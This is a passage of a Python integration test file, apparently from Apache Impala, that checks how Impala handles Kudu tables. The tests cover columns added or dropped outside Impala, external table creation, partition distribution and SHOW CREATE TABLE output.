def test_kudu_col_added(self, cursor, kudu_client, unique_database, cluster_properties):
"""Test adding a Kudu column outside of Impala."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and add a new col
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("b", "int32")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
op = table.new_insert((0, 0))
session.apply(op)
session.flush()
cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
to_unixtime_micros(kudu_client.latest_observed_timestamp()))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
if cluster_properties.is_catalog_v2_cluster():
# Changes in Kudu should be immediately visible to Impala with Catalog V2.
assert cursor.fetchall() == [(0, 0)]
else:
# Only the first col is visible to Impala. Impala will not know about the missing
# column, so '*' is expanded to known columns. This doesn't have a separate check
# because the query can proceed and checking would need to fetch metadata from the
# Kudu master, which is what REFRESH is for.
assert cursor.fetchall() == [(0, )]
# After a REFRESH both cols should be visible
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, 0)]
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_kudu_col_removed(self, cursor, kudu_client, unique_database):
"""Test removing a Kudu column outside of Impala."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
cursor.execute("insert into %s.foo values (0, 'foo')" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
except Exception as e:
expected_error = "Column 's' not found in kudu table impala::test_kudu_col_removed"
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, )]
def test_kudu_show_unbounded_range_partition(self, cursor, kudu_client,
unique_database):
"""Check that a single unbounded range partition gets printed correctly."""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
name = unique_database + ".unbounded_range_table"
try:
kudu_client.create_table(name, schema,
partitioning=Partitioning().set_range_partition_columns(["id"]))
kudu_table = kudu_client.table(name)
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("SHOW RANGE PARTITIONS %s" % impala_table_name)
assert cursor.description == [
('RANGE (id)', 'STRING', None, None, None, None, None)]
assert cursor.fetchall() == [('UNBOUNDED',)]
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.no_hybrid_clock
def test_column_storage_attributes(self, cursor, unique_database):
"""Tests that for every valid combination of column type, encoding, and compression,
we can insert a value and scan it back from Kudu."""
# This test takes about 2min and is unlikely to break, so only run it in exhaustive.
if self.exploration_strategy() != 'exhaustive':
pytest.skip("Only runs in exhaustive to reduce core time.")
table_name = "%s.storage_attrs" % unique_database
types = ['boolean', 'tinyint', 'smallint', 'int', 'bigint', 'float', 'double', \
'string', 'timestamp', 'decimal', 'date', 'varchar(10)']
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
create_query = "create table %s (id int primary key" % table_name
for t in types:
# We truncate the type attributes in the column name to keep things simple.
create_query += ", %s_col %s" % (t.split('(')[0], t)
create_query += ") partition by hash(id) partitions 16 stored as kudu"
cursor.execute(create_query)
encodings = ['AUTO_ENCODING', 'PLAIN_ENCODING', 'PREFIX_ENCODING', 'GROUP_VARINT', \
'RLE', 'DICT_ENCODING', 'BIT_SHUFFLE']
compressions = ['DEFAULT_COMPRESSION', 'NO_COMPRESSION', 'SNAPPY', 'LZ4', 'ZLIB']
i = 0
for e in encodings:
for c in compressions:
for t in types:
try:
# We truncate the type attributes in the column name to keep things simple.
cursor.execute("""alter table %s alter column %s_col
set encoding %s compression %s""" % (table_name, t.split('(')[0], e, c))
except Exception as err:
assert "encoding %s not supported for type" % e in str(err)
cursor.execute("""insert into %s values (%s, true, 0, 0, 0, 0, 0, 0, '0',
cast('2009-01-01' as timestamp), cast(0 as decimal),
cast('2010-01-01' as date), cast('' as varchar(10)))""" % (table_name, i))
cursor.execute("select * from %s where id = %s" % (table_name, i))
assert cursor.fetchall() == \
[(i, True, 0, 0, 0, 0, 0.0, 0.0, '0', datetime(2009, 1, 1, 0, 0), 0,
date(2010, 1, 1), '')]
i += 1
cursor.execute("select count(*) from %s" % table_name)
print cursor.fetchall() == [(i, )]
def test_concurrent_schema_change(self, cursor, unique_database):
"""Tests that an insert into a Kudu table with a concurrent schema change either
succeeds or fails gracefully."""
table_name = "%s.test_schema_change" % unique_database
cursor.execute("""create table %s (col0 bigint primary key, col1 bigint)
partition by hash(col0) partitions 16 stored as kudu""" % table_name)
iters = 5
def insert_values():
threading.current_thread().errors = []
client = self.create_impala_client()
for i in range(0, iters):
time.sleep(random.random()) # sleeps for up to one second
try:
client.execute("insert into %s values (0, 0), (1, 1)" % table_name)
except Exception as e:
threading.current_thread().errors.append(e)
insert_thread = threading.Thread(target=insert_values)
insert_thread.start()
for i in range(0, iters):
time.sleep(random.random()) # sleeps for up to one second
cursor.execute("alter table %s drop column col1" % table_name)
if i % 2 == 0:
cursor.execute("alter table %s add columns (col1 string)" % table_name)
else:
cursor.execute("alter table %s add columns (col1 bigint)" % table_name)
insert_thread.join()
for error in insert_thread.errors:
msg = str(error)
# The first two are AnalysisExceptions, the next two come from KuduTableSink::Open()
# if the schema has changed since analysis, the rest come from the Kudu server if
# the schema changes between KuduTableSink::Open() and when the write ops are sent.
possible_errors = [
"has fewer columns (1) than the SELECT / VALUES clause returns (2)",
"(type: TINYINT) is not compatible with column 'col1' (type: STRING)",
"has fewer columns than expected.",
"Column col1 has unexpected type.",
"Client provided column col1[int64 NULLABLE] not present in tablet",
"Client provided column col1 INT64 NULLABLE not present in tablet",
"The column 'col1' must have type string NULLABLE found int64 NULLABLE"
]
assert any(err in msg for err in possible_errors)
def _retry_query(self, cursor, query, expected):
retries = 0
while retries < 3:
cursor.execute(query)
result = cursor.fetchall()
if result == expected:
break
retries += 1
time.sleep(1)
assert retries < 3, \
"Did not get a correct result for %s after 3 retries: %s" % (query, result)
def test_read_modes(self, cursor, unique_database):
"""Other Kudu tests are run with a scan level of READ_AT_SNAPSHOT to have predicable
scan results. This test verifies that scans work as expected at the scan level of
READ_LATEST by retrying the scan if the results are incorrect."""
table_name = "%s.test_read_latest" % unique_database
cursor.execute("set kudu_read_mode=READ_LATEST")
cursor.execute("""create table %s (a int primary key, b string) partition by hash(a)
partitions 8 stored as kudu""" % table_name)
cursor.execute("insert into %s values (0, 'a'), (1, 'b'), (2, 'c')" % table_name)
self._retry_query(cursor, "select * from %s order by a" % table_name,
[(0, 'a'), (1, 'b'), (2, 'c')])
cursor.execute("""insert into %s select id, string_col from functional.alltypes
where id > 2 limit 100""" % table_name)
self._retry_query(cursor, "select count(*) from %s" % table_name, [(103,)])
def test_replica_selection(self, cursor, unique_database):
"""This test verifies that scans work as expected with different replica selection.
"""
table_name = "%s.replica_selection" % unique_database
cursor.execute("""create table %s (a int primary key, b string) partition by hash(a)
partitions 8 stored as kudu""" % table_name)
cursor.execute("""insert into %s select id, string_col from functional.alltypes
limit 100""" % table_name)
cursor.execute("set kudu_replica_selection=LEADER_ONLY")
cursor.execute("select count(*) from %s" % table_name)
assert cursor.fetchall() == [(100,)]
cursor.execute("set kudu_replica_selection=CLOSEST_REPLICA")
cursor.execute("select count(*) from %s" % table_name)
assert cursor.fetchall() == [(100,)]
class TestKuduPartitioning(KuduTestSuite):
@classmethod
def add_test_dimensions(cls):
super(TestKuduPartitioning, cls).add_test_dimensions()
# Test both the interpreted and the codegen'd path.
add_exec_option_dimension(cls, "disable_codegen", "0")
extend_exec_option_dimension(cls, "disable_codegen", "1")
def test_partitions_evenly_distributed(self, vector, cursor,
kudu_client, unique_database):
"""Sanity check for KuduPartitionExpr. We insert numbers into a table and check that
inserted elements are distributed evenly among the partitions. The assumption here is
that the source distribution is more or less uniform and that hashing retains this
property. This protects against some but not all errors. The number of partitions
should be the same as the number of impalads."""
table_name = "partitioning"
table_full_name = unique_database + ".partitioning"
cursor.execute("""CREATE TABLE %s (a INT PRIMARY KEY)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % table_full_name)
assert kudu_client.table_exists(KuduTestSuite.to_kudu_table_name(
unique_database, table_name))
query = "INSERT INTO %s SELECT id FROM functional.alltypes" % table_full_name
exec_options = dict((k, str(v)) for k, v
in vector.get_value('exec_option').iteritems())
cursor.execute(query, configuration=exec_options)
profile = cursor.get_profile()
numbers = TestKuduPartitioning.extract_kudu_rows_from_profile(profile)
TestKuduPartitioning.assert_rows_evenly_distributed(numbers)
@staticmethod
def assert_rows_evenly_distributed(rows):
TOLERANCE_RATIO = 0.1
avg = rows[0] # The first result is from the averaged summary.
values = rows[1:]
for value in values:
abs_diff = abs(avg - value)
ratio = float(abs_diff) / avg
assert ratio < TOLERANCE_RATIO
@staticmethod
def extract_kudu_rows_from_profile(profile):
# First we look for a header that contains "KuduTableSink", then under that we find
# the number of rows.
res = []
kudu_table_sink = "KuduTableSink"
total_num_rows_re = re.compile("TotalNumRows:.*\(([0-9]+)\)")
within_kudu_table_sink_section = False
for line in profile.splitlines():
if within_kudu_table_sink_section:
match = total_num_rows_re.search(line)
if match:
res.append(int(match.group(1)))
within_kudu_table_sink_section = False
else:
if kudu_table_sink in line:
within_kudu_table_sink_section = True
return res
class TestCreateExternalTable(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_external_timestamp_default_value(self, cursor, kudu_client, unique_database):
"""Checks that a Kudu table created outside Impala with a default value on a
UNIXTIME_MICROS column can be loaded by Impala, and validates the DESCRIBE
output is correct."""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
column_spec = schema_builder.add_column("ts", UNIXTIME_MICROS)
column_spec.default(datetime(2009, 1, 1, 0, 0, tzinfo=utc))
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
name = unique_database + ".tsdefault"
try:
kudu_client.create_table(name, schema,
partitioning=Partitioning().set_range_partition_columns(["id"]))
kudu_table = kudu_client.table(name)
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
table_desc = [[col.strip() if col else col for col in row] for row in cursor]
# Pytest shows truncated output on failure, so print the details just in case.
LOG.info(table_desc)
assert ["ts", "timestamp", "", "false", "true", "1230768000000000", \
"AUTO_ENCODING", "DEFAULT_COMPRESSION", "0"] in table_desc
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.hms_integration_enabled
def test_implicit_table_props(self, cursor, kudu_client):
"""Check that table properties added internally during table creation are as
expected.
"""
with self.temp_kudu_table(kudu_client, [STRING, INT8, BOOL], num_key_cols=2) \
as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE FORMATTED %s" % impala_table_name)
table_desc = [[col.strip() if col else col for col in row] for row in cursor]
LOG.info(table_desc)
# Pytest shows truncated output on failure, so print the details just in case.
assert ["", "EXTERNAL", "TRUE"] in table_desc
assert ["", "kudu.master_addresses", KUDU_MASTER_HOSTS] in table_desc
assert ["", "kudu.table_name", kudu_table.name] in table_desc
assert ["", "storage_handler", "org.apache.hadoop.hive.kudu.KuduStorageHandler"] \
in table_desc
@SkipIfKudu.hms_integration_enabled
def test_col_types(self, cursor, kudu_client):
"""Check that a table can be created using all available column types."""
# TODO: Add DECIMAL when the Kudu python client supports decimal
kudu_types = [STRING, BOOL, DOUBLE, FLOAT, INT16, INT32, INT64, INT8]
with self.temp_kudu_table(kudu_client, kudu_types) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
kudu_schema = kudu_table.schema
for i, (col_name, col_type, _, _, _, _, _, _, _) in enumerate(cursor):
kudu_col = kudu_schema[i]
assert col_name == kudu_col.name
assert col_type.upper() == \
self.kudu_col_type_to_impala_col_type(kudu_col.type.type)
@SkipIfKudu.hms_integration_enabled
def test_unsupported_binary_col(self, cursor, kudu_client):
"""Check that external tables with BINARY columns fail gracefully.
"""
with self.temp_kudu_table(kudu_client, [INT32, BINARY]) as kudu_table:
impala_table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (impala_table_name,
kudu_table.name))
assert False
except Exception as e:
assert "Kudu type 'binary' is not supported in Impala" in str(e)
@SkipIfKudu.hms_integration_enabled
def test_drop_external_table(self, cursor, kudu_client):
"""Check that dropping an external table only affects the catalog and does not delete
the table in Kudu.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
assert cursor.fetchall() == [(0, )]
try:
cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
assert False
except Exception as e:
assert "Could not resolve table reference" in str(e)
assert kudu_client.table_exists(kudu_table.name)
@SkipIfKudu.hms_integration_enabled
def test_explicit_name(self, cursor, kudu_client):
"""Check that a Kudu table can be specified using a table property."""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
table_name = self.random_table_name()
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (table_name, kudu_table.name))
with self.drop_impala_table_after_context(cursor, table_name):
cursor.execute("SELECT * FROM %s" % table_name)
assert len(cursor.fetchall()) == 0
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_preference(self, cursor, kudu_client):
"""Check that the table name from a table property is used when a table of the
implied name also exists.
"""
with self.temp_kudu_table(kudu_client, [INT64]) as preferred_kudu_table:
with self.temp_kudu_table(kudu_client, [INT8]) as other_kudu_table:
impala_table_name = self.get_kudu_table_base_name(other_kudu_table.name)
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
impala_table_name, preferred_kudu_table.name))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
assert cursor.fetchall() == \
[("a", "bigint", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_doesnt_exist(self, cursor, kudu_client):
kudu_table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
self.random_table_name(), kudu_table_name))
assert False
except Exception as e:
assert "Table does not exist in Kudu: '%s'" % kudu_table_name in str(e)
@SkipIfKudu.hms_integration_enabled
def test_explicit_name_doesnt_exist_but_implicit_does(self, cursor, kudu_client):
"""Check that when an explicit table name is given but that table doesn't exist,
there is no fall-through to an existing implicit table.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (
self.get_kudu_table_base_name(kudu_table.name), table_name))
assert False
except Exception as e:
assert "Table does not exist in Kudu: '%s'" % table_name in str(e)
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_table_without_partitioning(self, cursor, kudu_client, unique_database):
"""Test a Kudu table created without partitioning (i.e. equivalent to a single
unbounded partition). It is not possible to create such a table in Impala, but
it can be created directly in Kudu and then loaded as an external table.
Regression test for IMPALA-5154."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([])
name = "%s.one_big_unbounded_partition" % unique_database
try:
kudu_client.create_table(name, schema, partitioning=partitioning)
kudu_table = kudu_client.table(name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (name, props))
with self.drop_impala_table_after_context(cursor, name):
cursor.execute("INSERT INTO %s VALUES (1), (2), (3)" % name)
cursor.execute("SELECT COUNT(*) FROM %s" % name)
assert cursor.fetchall() == [(3, )]
try:
cursor.execute("SHOW RANGE PARTITIONS %s" % name)
assert False
except Exception as e:
assert "AnalysisException: SHOW RANGE PARTITIONS requested but table does "\
"not have range partitions" in str(e)
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_column_name_case(self, cursor, kudu_client, unique_database):
"""IMPALA-5286: Tests that an external Kudu table that was created with a column name
containing upper case letters is handled correctly."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
table_name = '%s.kudu_external_test' % unique_database
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
schema_builder = SchemaBuilder()
key_col = 'Key'
schema_builder.add_column(key_col, INT64).nullable(False).primary_key()
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([key_col])\
.add_range_partition([1], [10])
try:
kudu_client.create_table(table_name, schema, partitioning)
props = "tblproperties('kudu.table_name' = '%s')" % table_name
cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
# Perform a variety of operations on the table.
cursor.execute("insert into %s (kEy) values (5), (1), (4)" % table_name)
cursor.execute("select keY from %s where KeY %% 2 = 0" % table_name)
assert cursor.fetchall() == [(4, )]
cursor.execute("select * from %s order by kEY" % (table_name))
assert cursor.fetchall() == [(1, ), (4, ), (5, )]
# Do a join with a runtime filter targeting the column.
cursor.execute("select count(*) from %s a, %s b where a.key = b.key" %
(table_name, table_name))
assert cursor.fetchall() == [(3, )]
cursor.execute("alter table %s add range partition 11 < values < 20" % table_name)
new_key = "KEY2"
cursor.execute("alter table %s change KEy %s bigint" % (table_name, new_key))
val_col = "vaL"
cursor.execute("alter table %s add columns (%s bigint)" % (table_name, val_col))
cursor.execute("describe %s" % table_name)
results = cursor.fetchall()
# 'describe' should print the column name in lower case.
assert new_key.lower() in results[0]
assert val_col.lower() in results[1]
cursor.execute("alter table %s drop column Val" % table_name);
cursor.execute("describe %s" % table_name)
assert len(cursor.fetchall()) == 1
cursor.execute("alter table %s drop range partition 11 < values < 20" % table_name)
finally:
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
@SkipIfKudu.hms_integration_enabled
def test_conflicting_column_name(self, cursor, kudu_client, unique_database):
"""IMPALA-5283: Tests that loading an external Kudu table that was created with column
names that differ only in case results in an error."""
table_name = '%s.kudu_external_test' % unique_database
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
schema_builder = SchemaBuilder()
col0 = 'col'
schema_builder.add_column(col0, INT64).nullable(False).primary_key()
col1 = 'COL'
schema_builder.add_column(col1, INT64)
schema = schema_builder.build()
partitioning = Partitioning().set_range_partition_columns([col0])\
.add_range_partition([1], [10])
try:
kudu_client.create_table(table_name, schema, partitioning)
props = "tblproperties('kudu.table_name' = '%s')" % table_name
cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
assert False, 'create table should have resulted in an exception'
except Exception as e:
assert 'Error loading Kudu table: Impala does not support column names that ' \
+ 'differ only in casing' in str(e)
finally:
if kudu_client.table_exists(table_name):
kudu_client.delete_table(table_name)
class TestShowCreateTable(KuduTestSuite):
column_properties = "ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION"
def assert_show_create_equals(self, cursor, create_sql, show_create_sql,
do_exact_match=False):
"""Executes 'create_sql' to create a table, then runs "SHOW CREATE TABLE" and checks
that the output is the same as 'show_create_sql'. 'create_sql' and
'show_create_sql' can be templates that can be used with str.format(). format()
will be called with 'table' and 'db' as keyword args. Also, compares HMS-3 specific
output due to HMS translation. If do_exact_match is True does not manipulate the
output and compares exactly with the show_create_sql parameter.
"""
format_args = {"table": self.random_table_name(), "db": cursor.conn.db_name}
cursor.execute(create_sql.format(**format_args))
cursor.execute("SHOW CREATE TABLE {table}".format(**format_args))
output = cursor.fetchall()[0][0]
if not do_exact_match and HIVE_MAJOR_VERSION > 2:
# in case of HMS-3 all Kudu tables are translated to external tables with some
# additional properties. This code below makes sure that we have the expected table
# properties and the table is external
# TODO we should move these tests to a query.test file so that we can have better
# way to compare the output against different hive versions
assert output.startswith("CREATE EXTERNAL TABLE")
assert "TBLPROPERTIES ('external.table.purge'='TRUE', " in output
# We have made sure that the output starts with CREATE EXTERNAL TABLE, now we can
# change it to "CREATE TABLE" to make it easier to compare rest of the str
output = output.replace("CREATE EXTERNAL TABLE", "CREATE TABLE")
# We should also remove the additional tbl property external.table.purge so that we
# can compare the rest of output
output = output.replace("TBLPROPERTIES ('external.table.purge'='TRUE', ",
"TBLPROPERTIES (")
assert output == \
textwrap.dedent(show_create_sql.format(**format_args)).strip()
@SkipIfKudu.hms_integration_enabled
def test_primary_key_and_distribution(self, cursor):
# TODO: Add case with BLOCK_SIZE
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY)
PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY, d STRING NULL)
PARTITION BY HASH (c) PARTITIONS 3, RANGE (c)
(PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
PARTITION 2 < VALUES) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3, RANGE (c) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT ENCODING PLAIN_ENCODING, PRIMARY KEY (c))
PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING PLAIN_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT COMPRESSION LZ4, d STRING, PRIMARY KEY(c, d))
PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3,
RANGE (c, d) (PARTITION VALUE = (1, 'aaa'), PARTITION VALUE = (2, 'bbb'))
STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION LZ4,
d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c, d)
)
PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3, RANGE (c, d) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT, d STRING, e INT NULL DEFAULT 10, PRIMARY KEY(c, d))
PARTITION BY RANGE (c) (PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
PARTITION 2 < VALUES <= 3, PARTITION 3 < VALUES) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
e INT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT 10,
PRIMARY KEY (c, d)
)
PARTITION BY RANGE (c) (...)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT PRIMARY KEY) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
self.assert_show_create_equals(cursor,
"""
CREATE TABLE {table} (c INT COMMENT 'Ab 1@' PRIMARY KEY) STORED AS KUDU""",
"""
CREATE TABLE {db}.{{table}} (
c INT NOT NULL {p} COMMENT 'Ab 1@',
PRIMARY KEY (c)
)
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, p=self.column_properties,
kudu_addr=KUDU_MASTER_HOSTS))
@SkipIfKudu.hms_integration_enabled
def test_timestamp_default_value(self, cursor):
create_sql_fmt = """
CREATE TABLE {table} (c INT, d TIMESTAMP,
e TIMESTAMP NULL DEFAULT CAST('%s' AS TIMESTAMP),
PRIMARY KEY(c, d))
PARTITION BY HASH(c) PARTITIONS 3
STORED AS KUDU"""
# Long lines are unfortunate, but extra newlines will break the test.
show_create_sql_fmt = """
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
d TIMESTAMP NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
e TIMESTAMP NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT unix_micros_to_utc_timestamp(%s),
PRIMARY KEY (c, d)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS)
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000001000"),
show_create_sql_fmt % ("1230768000000001"))
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000001001"),
show_create_sql_fmt % ("1230768000000001"))
self.assert_show_create_equals(cursor,
create_sql_fmt % ("2009-01-01 00:00:00.000000999"),
show_create_sql_fmt % ("1230768000000001"))
@SkipIfKudu.hms_integration_enabled
def test_external_kudu_table_name_with_show_create(self, cursor, kudu_client,
unique_database):
"""Check that the generated kudu.table_name tblproperty is present with
show create table with external Kudu tables.
"""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
partitioning = Partitioning().set_range_partition_columns(["id"])
schema = schema_builder.build()
kudu_table_name = self.random_table_name()
try:
kudu_client.create_table(kudu_table_name, schema, partitioning)
